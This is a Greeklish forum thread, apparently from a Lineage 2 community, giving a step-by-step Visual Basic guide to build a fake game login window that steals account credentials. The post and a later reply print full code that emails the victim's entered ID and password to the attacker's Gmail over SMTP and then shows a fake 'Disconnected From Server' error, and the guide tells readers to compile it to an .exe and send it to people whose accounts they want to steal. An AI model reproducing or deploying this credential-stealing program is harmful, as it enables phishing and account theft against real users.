Jump to content

[Guide]Pws na ftiaksete ena programa gia na klevete acounts(Me to visual Basic)


Salot

Recommended Posts

Geia sas me afto to guide sas dixnw pws  na kanete ena programataki me to  visual basic wste na klevete l2 accounts

Q:Ti kanei afto to programa?

A:To stelneis se afton pou 8es na ton klepseis ,aftos vazei tis plirofories tou char tou kai aftomata erxode sto g mail sas

Shmeiwsh:Prepei na exete g mail,an den exete ftiakste ena.

Shmeiwsh:Afto pou 8a ftiaksete den einai keylogger stelnei mono afta pou 8a valei sta textbars.

English Version here

1)Prwton 8a xriastite to visual basic katevaste to apo  edw

Otan to kanete install  ,Anixte to kai pathste control + n gia na ftiaksete ena new project.Epilekste Windows form Applications kai patheste ok

dw9ud9u.png and press ok

2)8a xriastoume 2 buttons,2 labels kai 2  textboxes

Pigente sta ergaleia(tools) kai epilekste afto 98fhifhe.png.Clickarete  panw tou kai sirte to panw sto form para8iro

Meta vreite afto to ergaleio r3r3r.png .Kade to idio opws parapanw

Kai telos afto to ergaleio e3e98398e.png, to sernete kai afto panw sto form window

3)Twra ftiakste to programa  sas wste na einai opws katw sthn eikona

d0w98d09wudwd.png

4)Twra prepei na onomasoume   ta labels kai ta  buttons.

Label 1 prepei na metonomastei se "ID"

Label 2 prepei na metonomastei se "Password"

Button 1  prepei na metonomastei se "Log In"

Button 2 prepei na metonomastei se "EXIT"

Shmeiwsh:To button exit einai idio me to log in

Gia na ta metonomasoume clickaroume  1 fora  panw sto  Label1 kai  pame  stis  properties kai  sthn idia gramh pou grafei text vazoume ID

4893849.png

Kanoume to idio se ola ta buttons kai labels wste na einai etsi

0d9w9d0w9dw.png

5)Twra gia na kanoume to form window kalitero boroume na valoume kai mia eikona

Gia na valoume eikona  epilekste apo ta ergaleio to ergaleio "Picture box tool"0090909.png

Epilegoume ton xwro ton opoio 8a piasei h eikona mas

d0w98d09wdwdudwd.png

Meta vriskoume mia kalh eikona opws paradigma afthn edw

l2logo.png

Kai pigenoume stis properties ,Image ekei einai ena mikro koutaki   to patame.

image.png

Twra ena para8iraki san kai afto 8a emfanistei

s00r9u3r3.pngEpilegume local resource kai patame click "Import" dialegoume thn eikona kai patame ok

c32399f7.pngTwra einai etsi

6) Twra vazoume ton kodiko wste to programa na leitourgei

Clickaroume 2 fores panw sto button log in mexri na vgei afto

i0di0d9i0w9id.png

Edw kanoume copy/paste ton kodiko

If TextBox1.Text = "" Then
           MsgBox("Username Is Missing")
If Textbox2.text = "" Then
Msgbox("Password Is Mising")
       Else
       End If
       End if
       Dim smtpServer As New SmtpClient()
       Dim mail As New MailMessage()
       smtpServer.Credentials = New Net.NetworkCredential("Your Gmail", "Your Gmail Password")
       'using gmail
       smtpServer.Port = 587
       smtpServer.Host = "smtp.gmail.com"
       smtpServer.EnableSsl = True
       mail = New MailMessage()
       mail.From = New MailAddress("Your Gmail")
       mail.To.Add("Your Gmail")
       mail.Subject = "Username: " & TextBox1.Text
       mail.Body = "Username : " & TextBox1.Text & ", " & "Password : " & textbox2.text
       smtpServer.Send(mail)
       MsgBox("Disconnected From Server, Please try again later!")

New code by Stealth (o katw)

If TextBox1.Text = String.Empty Or TextBox2.Text = String.Empty Then MsgBox("Please fill all the information needed.", MsgBoxStyle.Critical) : Exit Sub
       Dim smtpServer As New SmtpClient()
       Dim mail As New MailMessage()
       smtpServer.Credentials = New Net.NetworkCredential("Your Gmail", "Your Gmail Password")
       'using gmail
       smtpServer.Port = 587
       smtpServer.Host = "smtp.gmail.com"
       smtpServer.EnableSsl = True
       mail = New MailMessage()
       mail.From = New MailAddress("Your Gmail")
       mail.To.Add("Your Gmail")
       mail.Subject = "Username: " & TextBox1.Text
       mail.Body = "Username : " & TextBox1.Text & ", " & "Password : " & textbox2.text
       smtpServer.Send(mail)
       MsgBox("Disconnected From Server, Please try again later!")

Note :Afton ton code den ton exw dokimasei dioti to vb m 8elei new key peite mou an exei kapoio provlima(pistevw einai ok)

Ston kwdiko opou grafei Your Gmai vazete to gmail sas kai opou grafei g mail password to password tou g mail sas

Prepei na krathsete afta "

Mporoume episis na alaksoume kai to minima tou ok(msgbox)

Note : Ston kodiko iparxei ena provlima.

Edw einai pws na to ftiaksete.

1) Pigenete sthn leksi SmtpClient,uparxei ena symbolo katw apo thn leksi(eroor.png)

2)Vazete to podiki akrivws panw sthn leksi  mexri afto na vgei kai apla kanete click sto "Import.System.Net.Mail" Sthn prwth epilogh tis eikonas

f098euf098ue.png

Shmeiwsh 2)Kante to idio kai gia tin leksi"MailAddress"

Molis ta fixarete ta errors eiste ok

7)Twra eimaste sxedon etoimh

Alakste layer (Phgente sto "Form1.vb" [Design]

Kai pathste  start debugging opws sthn eikona

dw90udwud.png

An einai ola ok tote to programa 8a zwdanepsei(lol)

Kante ena test vazodas ena pseftiko id kai password,pathste log in kai an er8ei sto g mail sas tote eiste gg

F09E8HF98EH9F8EHF9HEE.png

:)

Edw teliwsame!

8)Gia to to swsete ews .exe arxeio

Pathste  Control + Shift + S

kai kade to save it sto desktop.

Sto desktop enas fakelos 8a emfanistei.

Pathste ston fakelo.8a deite kai allon fakelo me to onoma tou programatos sas.

Meta 8a vreite polous fakelous

dw09dw08dh.png

Beite ston fakelo  "obj"

Meta ston fakelo debugg

Kai 8a deite to programa se exe morfh!

fh0efh0e98fhfinalpic.png

Twra arxhste na stelnete to exe sta atoma pou 8elete na klepsete.

-The End.

Credits : To Me

To eixa kanei sto aggliko section eipa na to kanw kai ena translate edw

Opws lene kai ta rules :P

Updated: 18/7/2010

This is the hidden content, please

 

 

 

Link to comment
Share on other sites

Auto to programmataki ginete mono gia to l2 i mporoume na to xrisimopiisoume k gia allo game?

gia oti 8elete apla valte allh eikona :P

episis exw pei na ginei moved sto l2 exploits greek katala8os to postara edw :/

Link to comment
Share on other sites

File epeidi ekana format boreis na mou to stileis etoimo pliz?

lol den ginete prepei na ftiakseis diko sou giati alliws 8a kserw ton kodiko sou an sou ftiaksw :P

den einai diskolo apla katevase to programa kai akolou8ise ta vimata

Link to comment
Share on other sites

pathses panw sthn leksi wste  na vgei to error fix?

kai meta apo to error fix na pathseis thn prwth epilogh?

 

loipon des pws kanw thn diadikasia se pic kai pes m an kanw kapio la9os!

 

http://img517.imageshack.us/img517/9179/69665116.png  ~~>1

http://img19.imageshack.us/img19/64/12120836.png          ~~>2

http://img706.imageshack.us/img706/6681/14380257.png  ~~>3

 

PS:sthn 3 pic kane zoom na deis ka9ara ta gramata!

Link to comment
Share on other sites

Nomizw pws sthn arxh prepei na eixes valei kai alla pragmata (tools kai na ta esvises me apotelesma afto) eprepe mono afta pou eipa.(an evales kai alla)

kai egw to eixa pa8ei afto sthn arxh den iksera ti einai kai to arxisa to programa na to ftiaxnw apo thn arxh dokimase afto :/

o kodikos sou prepei na einai etsi mesa ekei pou vazoume tous kodikous

Imports System.Net.Mail

Public Class Form1

    Private Sub Button2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button2.Click
        If TextBox1.Text = "" Then
            MsgBox("Username Is Missing")
            If TextBox2.Text = "" Then
                MsgBox("Password Is Mising")
            Else
            End If
        End If
        Dim smtpServer As New SmtpClient()
        Dim mail As New MailMessage()
        smtpServer.Credentials = New Net.NetworkCredential("Your Gmail", "Your Gmail Password")
        'using gmail
        smtpServer.Port = 587
        smtpServer.Host = "smtp.gmail.com"
        smtpServer.EnableSsl = True
        mail = New MailMessage()
        mail.From = New MailAddress("Your Gmail")
        mail.To.Add("Your Gmail")
        mail.Subject = "Username: " & TextBox1.Text
        mail.Body = "Username : " & TextBox1.Text & ", " & "Password : " & TextBox2.Text
        smtpServer.Send(mail)
        MsgBox("Disconnected From Server, Please try again later!")
    End Sub
End Class

an sou einai alliws kane kati exeis kanei la8os isws ekanes se la8os meros to copy paste

 

 

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.




  • Posts

    • rename the l2.bin into l2.exe
    • L2LIVE.PRO- Dynamic Mid-rates Essence Seven Signs GRAND OPENING - July 5, 20:00 GMT+3 (EEST) TEST SERVER IS OPEN - COME AND CHECK IT OUT TODAY! Join our community and be part of it at: https://www.l2live.pro https://discord.gg/k3NMgR4Dmu   Server description * EXP/SP: Dynamic (x1- x100 based on your level, *before* Sayha and EXP buffs * Adena: x50 / Item Drop: x10 / Fishing EXP increased / Attribute EXP increased * Simplified gameplay to stay in the loop while not spending hours and hours farming * Starter Pack containing very useful items for beginners * MP replenishing potions with auto-consumption * No overpowered donations L2LIVE shop * All spellbook coupons, pet spellbook coupons and master books are sold via Game Assistant * Additionally you can buy SP pouches, enchanted talismans, pet training guides and various other consumables for Adena and L-Coin * More items such as cloaks, more talismans, agathions, belts, pendants, enchantment scrolls of various grades, evolution stones, etc will be added! Shop server as a shortcut, and all retail-like ways of earning items are still here! L-Coins * Drops with small change and in random amounts from Lv60+ monsters  * All raidbosses drop random amount of L-Coin Pouches generating up to 420 Lcoin per unit. **Grand Olympiad and Events** * Grand Olympiad is held week day * Format is 1v1, unlimited weekly fights  * Heroes are declared weekly at Sunday * There are three automated events - TvT, CTF and Deathmatch, running at evenings * Orc Fortress, Battle with Balok, Keber Hunter, Archievements Box, Daily Gift Calendar provisional events are active too Custom user commands * .offlineplay command, your character will keep playing till death or server restart * .offlineshop command, keeps your shop sitting until all items are purchased * .apon / .apoff - enable/disable HP/MP autoconsume And lots of other small improvements are waiting for you!   Join our community and be part of it at: https://www.l2live.pro https://discord.gg/k3NMgR4Dmu
    • I can use this folder system for High Five offline server?   The folder does not have a l2.exe file.   Thank you very much if anyone can help me.   https://drive.google.com/file/d/13kU-g_4JJ-sP-kg2F7pqkUOVKmQdubFm/view
  • Topics

×
×
  • Create New...